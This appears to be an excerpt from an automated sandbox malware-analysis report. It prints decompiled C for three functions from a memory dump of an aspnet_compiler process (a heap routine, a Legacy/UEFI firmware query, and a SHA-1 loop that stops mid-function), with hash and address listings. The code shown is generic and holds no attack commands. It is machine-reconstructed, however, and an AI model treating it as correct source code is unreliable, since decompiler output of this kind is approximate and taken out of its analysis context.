                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                  • API String ID: 2994545307-336120773
                                                  • Opcode ID: f554b403cd085bd2d03235058ebbdfaa58614d62fc7e881c3933a7c1b0e1414d
                                                  • Instruction ID: f8a269ae484ea1bdf5c99c03c586f87a7392451ae6cac82ef93c81ecf4d7544d
                                                  • Opcode Fuzzy Hash: f554b403cd085bd2d03235058ebbdfaa58614d62fc7e881c3933a7c1b0e1414d
                                                  • Instruction Fuzzy Hash: 8D312135200500EFD721EB9DC889F6A77ACEF40B22F284469F509CB251E671EA40CB6A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0194E539 Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 60%
                                                  			E0194E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E0194BBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							L0194BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							L0194AFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(L018C9730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E0194A80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E0194A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(L018C9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E0194A80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E0194A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E018A2280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E0189B090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									L0189FFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(L018A7D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									L0193FEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}




































                                                  0x0194e547
                                                  0x0194e549
                                                  0x0194e54f
                                                  0x0194e553
                                                  0x0194e557
                                                  0x0194e55a
                                                  0x0194e55c
                                                  0x0194e55f
                                                  0x0194e561
                                                  0x0194e567
                                                  0x0194e56b
                                                  0x0194e7e2
                                                  0x00000000
                                                  0x0194e571
                                                  0x0194e575
                                                  0x0194e577
                                                  0x0194e57b
                                                  0x0194e57c
                                                  0x0194e57d
                                                  0x0194e57e
                                                  0x0194e57f
                                                  0x0194e588
                                                  0x0194e58f
                                                  0x0194e591
                                                  0x0194e592
                                                  0x0194e592
                                                  0x0194e596
                                                  0x0194e59e
                                                  0x0194e5a0
                                                  0x0194e5a6
                                                  0x0194e61d
                                                  0x0194e61d
                                                  0x0194e621
                                                  0x0194e623
                                                  0x0194e630
                                                  0x0194e630
                                                  0x0194e7e6
                                                  0x0194e7eb
                                                  0x0194e7ed
                                                  0x0194e7f4
                                                  0x0194e7fa
                                                  0x0194e7ff
                                                  0x0194e7ff
                                                  0x0194e80a
                                                  0x0194e812
                                                  0x0194e812
                                                  0x0194e5ab
                                                  0x0194e5b4
                                                  0x0194e5b9
                                                  0x0194e5be
                                                  0x0194e5c0
                                                  0x0194e5c2
                                                  0x0194e5c8
                                                  0x0194e5c9
                                                  0x0194e5cb
                                                  0x0194e5cc
                                                  0x0194e5d5
                                                  0x0194e5e4
                                                  0x0194e5f1
                                                  0x0194e5f8
                                                  0x0194e5f8
                                                  0x0194e5d5
                                                  0x0194e602
                                                  0x0194e616
                                                  0x0194e63d
                                                  0x0194e644
                                                  0x0194e64d
                                                  0x0194e652
                                                  0x0194e657
                                                  0x0194e659
                                                  0x0194e65b
                                                  0x0194e661
                                                  0x0194e662
                                                  0x0194e664
                                                  0x0194e665
                                                  0x0194e66e
                                                  0x0194e67d
                                                  0x0194e68a
                                                  0x0194e691
                                                  0x0194e691
                                                  0x0194e66e
                                                  0x0194e6b0
                                                  0x00000000
                                                  0x0194e6b6
                                                  0x0194e6bd
                                                  0x0194e6c7
                                                  0x0194e6d7
                                                  0x0194e6d9
                                                  0x0194e6db
                                                  0x0194e6de
                                                  0x0194e6e3
                                                  0x0194e6f3
                                                  0x0194e6fc
                                                  0x0194e700
                                                  0x0194e700
                                                  0x0194e704
                                                  0x0194e70a
                                                  0x0194e70a
                                                  0x0194e713
                                                  0x0194e716
                                                  0x0194e719
                                                  0x0194e720
                                                  0x0194e761
                                                  0x0194e76b
                                                  0x0194e774
                                                  0x0194e77a
                                                  0x0194e77a
                                                  0x0194e78a
                                                  0x0194e791
                                                  0x0194e799
                                                  0x0194e79b
                                                  0x0194e79f
                                                  0x0194e7aa
                                                  0x0194e7c0
                                                  0x0194e7ac
                                                  0x0194e7b2
                                                  0x0194e7b9
                                                  0x0194e7b9
                                                  0x0194e7c7
                                                  0x0194e806
                                                  0x00000000
                                                  0x0194e7c9
                                                  0x0194e7d1
                                                  0x0194e7d8
                                                  0x00000000
                                                  0x0194e7d8
                                                  0x00000000
                                                  0x00000000
                                                  0x0194e722
                                                  0x0194e72e
                                                  0x0194e748
                                                  0x0194e74c
                                                  0x0194e754
                                                  0x0194e756
                                                  0x0194e75c
                                                  0x0194e75c
                                                  0x00000000
                                                  0x0194e75c
                                                  0x0194e758
                                                  0x0194e758
                                                  0x00000000
                                                  0x0194e758
                                                  0x0194e750
                                                  0x00000000
                                                  0x00000000
                                                  0x0194e752
                                                  0x00000000
                                                  0x0194e752
                                                  0x0194e730
                                                  0x0194e735
                                                  0x0194e73d
                                                  0x0194e73f
                                                  0x00000000
                                                  0x00000000
                                                  0x0194e741
                                                  0x0194e741
                                                  0x00000000
                                                  0x0194e741
                                                  0x0194e739
                                                  0x00000000
                                                  0x00000000
                                                  0x0194e73b
                                                  0x00000000
                                                  0x0194e73b
                                                  0x0194e722
                                                  0x0194e720
                                                  0x0194e6b0
                                                  0x0194e618
                                                  0x00000000
                                                  0x0194e618

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: `$`
                                                  • API String ID: 0-197956300
                                                  • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                  • Instruction ID: 24d926a9acfa3a9cf0ad09c9611c523ddf84e81ebd10d34a5a89e5cfe29961f2
                                                  • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                  • Instruction Fuzzy Hash: 059160316043429BE725CF29C945F1BBBE9BF84725F14892DF699CB280E778E904CB52
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 019051BE Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 77%
                                                  			E019051BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x19605f0);
				E018DD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					L0189EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E019053CA(0);
						return E018DD130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E018CF3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = L018A3690(1, _t117, 0x1861810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E018CAA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L018A4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E018CAA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E0190500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E018C9860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                                                  0x019051be
                                                  0x019051c3
                                                  0x019051c8
                                                  0x019051cd
                                                  0x019051d0
                                                  0x019051d3
                                                  0x019051d8
                                                  0x019051db
                                                  0x019051de
                                                  0x019051e0
                                                  0x019051e3
                                                  0x019051e6
                                                  0x019051e8
                                                  0x01905342
                                                  0x01905351
                                                  0x01905356
                                                  0x0190535a
                                                  0x01905360
                                                  0x01905363
                                                  0x01905366
                                                  0x01905369
                                                  0x01905369
                                                  0x0190536b
                                                  0x0190536b
                                                  0x01905370
                                                  0x019053a3
                                                  0x019053a4
                                                  0x019053a6
                                                  0x019053ab
                                                  0x019053ab
                                                  0x019053ae
                                                  0x019053ae
                                                  0x019053b5
                                                  0x019053bf
                                                  0x019053bf
                                                  0x01905375
                                                  0x01905396
                                                  0x019053a0
                                                  0x019053a0
                                                  0x00000000
                                                  0x01905396
                                                  0x01905377
                                                  0x01905379
                                                  0x0190537f
                                                  0x0190538c
                                                  0x01905390
                                                  0x00000000
                                                  0x01905390
                                                  0x019051ee
                                                  0x019051f1
                                                  0x01905301
                                                  0x01905310
                                                  0x01905315
                                                  0x01905318
                                                  0x0190531b
                                                  0x01905320
                                                  0x0190532e
                                                  0x01905331
                                                  0x00000000
                                                  0x01905331
                                                  0x01905328
                                                  0x01905329
                                                  0x00000000
                                                  0x01905329
                                                  0x019051fa
                                                  0x01905235
                                                  0x01905236
                                                  0x01905239
                                                  0x0190523f
                                                  0x01905240
                                                  0x01905241
                                                  0x01905242
                                                  0x01905246
                                                  0x01905247
                                                  0x0190524e
                                                  0x01905251
                                                  0x01905267
                                                  0x01905269
                                                  0x0190526e
                                                  0x0190527d
                                                  0x0190527e
                                                  0x01905281
                                                  0x01905282
                                                  0x01905287
                                                  0x01905288
                                                  0x0190528a
                                                  0x0190528f
                                                  0x01905294
                                                  0x00000000
                                                  0x00000000
                                                  0x0190529a
                                                  0x0190529c
                                                  0x0190529e
                                                  0x0190529e
                                                  0x019052a4
                                                  0x019052b0
                                                  0x00000000
                                                  0x00000000
                                                  0x019052ba
                                                  0x019052bc
                                                  0x019052bc
                                                  0x019052d4
                                                  0x019052d9
                                                  0x019052dc
                                                  0x019052e1
                                                  0x00000000
                                                  0x00000000
                                                  0x019052e7
                                                  0x019052f4
                                                  0x00000000
                                                  0x019052f4
                                                  0x01905270
                                                  0x00000000
                                                  0x01905270
                                                  0x019051fc
                                                  0x019051fd
                                                  0x01905202
                                                  0x01905203
                                                  0x01905205
                                                  0x0190520a
                                                  0x0190520f
                                                  0x00000000
                                                  0x00000000
                                                  0x0190521b
                                                  0x01905226
                                                  0x0190522b
                                                  0x0190521d
                                                  0x0190521d
                                                  0x01905222
                                                  0x01905222
                                                  0x0190522d
                                                  0x00000000

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID: Legacy$UEFI
                                                  • API String ID: 2994545307-634100481
                                                  • Opcode ID: a166b58ce8b3d22a92dd26807d910d346927ccce58c5c118325699b93fc2840c
                                                  • Instruction ID: c4a50b93d41f18d0894838f7c17844bbc4d481b205b169e8fab9ba71eecf4ba0
                                                  • Opcode Fuzzy Hash: a166b58ce8b3d22a92dd26807d910d346927ccce58c5c118325699b93fc2840c
                                                  • Instruction Fuzzy Hash: 0E515C71A00609DFEB26DFA9C980AADBBF8FF48700F15442DE659EB291D7719A40CF50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00408C80 Relevance: 1.7, Strings: 1, Instructions: 423COMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 73%
                                                  			E00408C80(signed int* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v304;
				signed char* _t277;
				signed int* _t278;
				signed int _t279;
				signed int _t285;
				signed int _t288;
				signed int _t292;
				signed int _t295;
				signed int _t299;
				signed int _t303;
				signed int _t305;
				signed int _t311;
				signed int _t318;
				signed int _t320;
				signed int _t323;
				signed int _t325;
				signed int _t334;
				signed int _t340;
				signed int _t341;
				signed int _t346;
				signed int _t353;
				signed int _t357;
				signed int _t358;
				signed int _t362;
				signed int _t365;
				signed int _t369;
				signed int _t370;
				signed int _t399;
				signed int _t404;
				signed int _t410;
				signed int _t413;
				signed int _t420;
				signed int _t423;
				signed int _t432;
				signed int _t434;
				signed int _t437;
				signed int _t445;
				signed int _t459;
				signed int _t462;
				signed int _t463;
				signed int _t464;
				signed int _t470;
				signed int _t478;
				signed int _t479;
				signed int* _t480;
				signed int* _t481;
				signed int _t488;
				signed int _t491;
				signed int _t496;
				signed int _t499;
				signed int _t502;
				signed int _t505;
				signed int _t506;
				signed int _t510;
				signed int _t522;
				signed int _t525;
				signed int _t532;
				void* _t536;

				_t481 = _a4;
				_t353 = 0;
				_t2 =  &(_t481[7]); // 0x1b
				_t277 = _t2;
				do {
					 *(_t536 + _t353 * 4 - 0x14c) = ((( *(_t277 - 1) & 0x000000ff) << 0x00000008 |  *_t277 & 0x000000ff) << 0x00000008 | _t277[1] & 0x000000ff) << 0x00000008 | _t277[2] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x148) = (((_t277[3] & 0x000000ff) << 0x00000008 | _t277[4] & 0x000000ff) << 0x00000008 | _t277[5] & 0x000000ff) << 0x00000008 | _t277[6] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x144) = (((_t277[7] & 0x000000ff) << 0x00000008 | _t277[8] & 0x000000ff) << 0x00000008 | _t277[9] & 0x000000ff) << 0x00000008 | _t277[0xa] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x140) = (((_t277[0xb] & 0x000000ff) << 0x00000008 | _t277[0xc] & 0x000000ff) << 0x00000008 | _t277[0xd] & 0x000000ff) << 0x00000008 | _t277[0xe] & 0x000000ff;
					_t353 = _t353 + 4;
					_t277 =  &(_t277[0x10]);
				} while (_t353 < 0x10);
				_t278 =  &_v304;
				_v8 = 0x10;
				do {
					_t399 =  *(_t278 - 0x18);
					_t459 =  *(_t278 - 0x14);
					_t357 =  *(_t278 - 0x20) ^ _t278[5] ^  *_t278 ^ _t399;
					asm("rol ecx, 1");
					asm("rol ebx, 1");
					_t278[9] =  *(_t278 - 0x1c) ^ _t278[6] ^ _t278[1] ^ _t459;
					_t278[8] = _t357;
					_t318 = _t278[7] ^  *(_t278 - 0x10) ^ _t278[2];
					_t278 =  &(_t278[4]);
					asm("rol ebx, 1");
					asm("rol edx, 1");
					_t46 =  &_v8;
					 *_t46 = _v8 - 1;
					_t278[6] = _t318 ^ _t399;
					_t278[7] =  *(_t278 - 0x1c) ^  *(_t278 - 4) ^ _t357 ^ _t459;
				} while ( *_t46 != 0);
				_t320 =  *_t481;
				_t279 = _t481[1];
				_t358 = _t481[2];
				_t404 = _t481[3];
				_v12 = _t320;
				_v16 = _t481[4];
				_v8 = 0;
				do {
					asm("rol ebx, 0x5");
					_t462 = _v8;
					_t488 = _t320 + ( !_t279 & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x14c)) + _v16 + 0x5a827999;
					_t323 = _v12;
					asm("ror eax, 0x2");
					_v16 = _t404;
					_v12 = _t488;
					asm("rol esi, 0x5");
					_v8 = _t358;
					_t410 = _t488 + ( !_t323 & _t358 | _t279 & _t323) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x148)) + _v16 + 0x5a827999;
					_t491 = _t279;
					asm("ror ebx, 0x2");
					_v16 = _v8;
					_t362 = _v12;
					_v8 = _t323;
					_t325 = _v8;
					_v12 = _t410;
					asm("rol edx, 0x5");
					_t285 = _t410 + ( !_t362 & _t491 | _t323 & _t362) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x144)) + _v16 + 0x5a827999;
					_t413 = _v12;
					_v16 = _t491;
					asm("ror ecx, 0x2");
					_v8 = _t362;
					_v12 = _t285;
					asm("rol eax, 0x5");
					_v16 = _t325;
					_t496 = _t285 + ( !_t413 & _t325 | _t362 & _t413) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x140)) + _v16 + 0x5a827999;
					_t358 = _v12;
					_t288 = _v8;
					asm("ror edx, 0x2");
					_v8 = _t413;
					_v12 = _t496;
					asm("rol esi, 0x5");
					_v16 = _t288;
					_t279 = _v12;
					_t499 = _t496 + ( !_t358 & _t288 | _t413 & _t358) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x13c)) + _v16 + 0x5a827999;
					_t404 = _v8;
					asm("ror ecx, 0x2");
					_t463 = _t462 + 5;
					_t320 = _t499;
					_v12 = _t320;
					_v8 = _t463;
				} while (_t463 < 0x14);
				_t464 = 0x14;
				do {
					asm("rol esi, 0x5");
					asm("ror eax, 0x2");
					_v16 = _t404;
					_t502 = _t499 + (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
					_t334 = _v12;
					_v12 = _t502;
					asm("rol esi, 0x5");
					_t420 = _t502 + (_t358 ^ _t279 ^ _t334) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
					asm("ror ebx, 0x2");
					_t505 = _t279;
					_v16 = _t358;
					_t365 = _v12;
					_v12 = _t420;
					asm("rol edx, 0x5");
					asm("ror ecx, 0x2");
					_t292 = _t420 + (_t279 ^ _t334 ^ _t365) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
					_t423 = _v12;
					_v8 = _t334;
					_v8 = _t365;
					_v12 = _t292;
					asm("rol eax, 0x5");
					_t464 = _t464 + 5;
					_t358 = _v12;
					asm("ror edx, 0x2");
					_t146 = _t505 + 0x6ed9eba1; // 0x6ed9eb9f
					_t506 = _t292 + (_t334 ^ _v8 ^ _t423) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x154)) + _t146;
					_t295 = _v8;
					_v8 = _t423;
					_v12 = _t506;
					asm("rol esi, 0x5");
					_t404 = _v8;
					_t499 = _t506 + (_t295 ^ _v8 ^ _t358) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x150)) + _t334 + 0x6ed9eba1;
					_v16 = _t295;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t499;
				} while (_t464 < 0x28);
				_v8 = 0x28;
				do {
					asm("rol esi, 0x5");
					_v16 = _t404;
					asm("ror eax, 0x2");
					_t510 = ((_t358 | _t279) & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _v8 * 4 - 0x14c)) + _t499 + _v16 - 0x70e44324;
					_t470 = _v12;
					_v12 = _t510;
					asm("rol esi, 0x5");
					_t340 = _v8;
					asm("ror edi, 0x2");
					_t432 = ((_t279 | _t470) & _t358 | _t279 & _t470) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x148)) + _t510 + _v16 - 0x70e44324;
					_v16 = _t358;
					_t369 = _v12;
					_v12 = _t432;
					asm("rol edx, 0x5");
					_v8 = _t279;
					_t434 = ((_t470 | _t369) & _t279 | _t470 & _t369) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x144)) + _t432 + _v16 - 0x70e44324;
					asm("ror ecx, 0x2");
					_v16 = _v8;
					_t299 = _v12;
					_v8 = _t470;
					_v12 = _t434;
					asm("rol edx, 0x5");
					asm("ror eax, 0x2");
					_t522 = ((_t369 | _t299) & _t470 | _t369 & _t299) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x140)) + _t434 + _v16 - 0x70e44324;
					_v16 = _v8;
					_t437 = _t369;
					_t358 = _v12;
					_v8 = _t437;
					_v12 = _t522;
					asm("rol esi, 0x5");
					_v16 = _v8;
					_t499 = ((_t299 | _t358) & _t437 | _t299 & _t358) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x13c)) + _t522 + _v16 - 0x70e44324;
					_t404 = _t299;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t499;
					_t341 = _t340 + 5;
					_v8 = _t341;
				} while (_t341 < 0x3c);
				_t478 = 0x3c;
				_v8 = 0x3c;
				do {
					asm("rol esi, 0x5");
					_t479 = _v8;
					asm("ror eax, 0x2");
					_t525 = (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t478 * 4 - 0x14c)) + _t499 + _v16 - 0x359d3e2a;
					_t346 = _v12;
					_v16 = _t404;
					_v12 = _t525;
					asm("rol esi, 0x5");
					asm("ror ebx, 0x2");
					_t445 = (_t358 ^ _t279 ^ _t346) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x148)) + _t525 + _v16 - 0x359d3e2a;
					_v16 = _t358;
					_t370 = _v12;
					_v12 = _t445;
					asm("rol edx, 0x5");
					_v16 = _t279;
					asm("ror ecx, 0x2");
					_t303 = (_t279 ^ _t346 ^ _t370) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x144)) + _t445 + _v16 - 0x359d3e2a;
					_t404 = _v12;
					_v12 = _t303;
					asm("rol eax, 0x5");
					_v16 = _t346;
					_t532 = (_t346 ^ _t370 ^ _t404) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x140)) + _t303 + _v16 - 0x359d3e2a;
					_t305 = _t370;
					_v8 = _t346;
					asm("ror edx, 0x2");
